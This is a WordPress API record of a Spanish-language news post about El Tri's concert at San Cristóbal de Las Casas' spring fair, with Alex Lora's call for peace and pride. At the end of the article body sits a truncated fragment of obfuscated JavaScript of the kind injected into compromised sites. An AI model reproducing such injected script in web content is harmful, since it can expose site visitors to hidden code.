{"id":21598,"date":"2025-04-26T18:39:39","date_gmt":"2025-04-26T18:39:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21598"},"modified":"2025-04-26T18:39:39","modified_gmt":"2025-04-26T18:39:39","slug":"con-un-llamado-a-la-paz-al-deporte-y-al-orgullo-mexicano-el-tri-enciende-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21598","title":{"rendered":"Con un llamado a la paz, al deporte y al orgullo mexicano, El Tri enciende San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21599\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0002-1024x682.jpg\" alt=\"\" class=\"wp-image-21599\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0002-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0002-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0002-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0002-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0002-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0002.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21600\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0003-1024x682.jpg\" alt=\"\" class=\"wp-image-21600\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0003-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0003-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0003-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0003-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0003-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0003.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21601\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0000-1024x682.jpg\" alt=\"\" class=\"wp-image-21601\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0000-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0000-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0000-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0000-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0000-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0000.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21602\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0001-1024x682.jpg\" alt=\"\" class=\"wp-image-21602\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0001-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0001-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0001-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0001-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0001-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250426-WA0001.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 26 de abril de 2025.- En el marco de la edici\u00f3n 155 de la Feria de la Primavera y de la Paz, la legendaria banda de rock mexicano El Tri se present\u00f3 la noche del viernes en la explanada del parque de feria, reuniendo a miles de asistentes en un emotivo concierto cargado de energ\u00eda, m\u00fasica y mensajes de unidad.<\/p>\n\n\n\n<p>Con su caracter\u00edstico estilo y poderosa presencia esc\u00e9nica, Alex Lora, l\u00edder de la agrupaci\u00f3n, hizo un llamado a la paz, al fomento del deporte y al orgullo por la identidad mexicana, arrancando ovaciones de un p\u00fablico que core\u00f3 cada una de sus canciones.<\/p>\n\n\n\n<p>Durante el evento la noche de este viernes, Lora agradeci\u00f3 la calidez de los Sancristobalenses y reconoci\u00f3 la riqueza cultural y natural de Chiapas. \u201cEs un honor estar en esta tierra tan chingona, llena de historia, belleza y gente buena. Invito a todos a conocer este rinc\u00f3n del mundo que tanto tiene que ofrecer\u201d, expres\u00f3 entre aplausos.<\/p>\n\n\n\n<p>El concierto form\u00f3 parte de las actividades principales de la tradicional feria, que este a\u00f1o volvi\u00f3 a congregar a familias, j\u00f3venes y visitantes de distintas partes del estado y del pa\u00eds, en un ambiente festivo y de sana convivencia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 26 de abril de 2025.- En el marco de la edici\u00f3n 155 de la Feria de la Primavera y de la Paz, la legendaria banda de rock mexicano El Tri se present\u00f3 la noche del viernes en la explanada del parque de feria, reuniendo a miles de asistentes en un &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21602,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21598","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21598","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21598"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21598\/revisions"}],"predecessor-version":[{"id":21603,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21598\/revisions\/21603"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21602"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21598"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21598"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21598"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}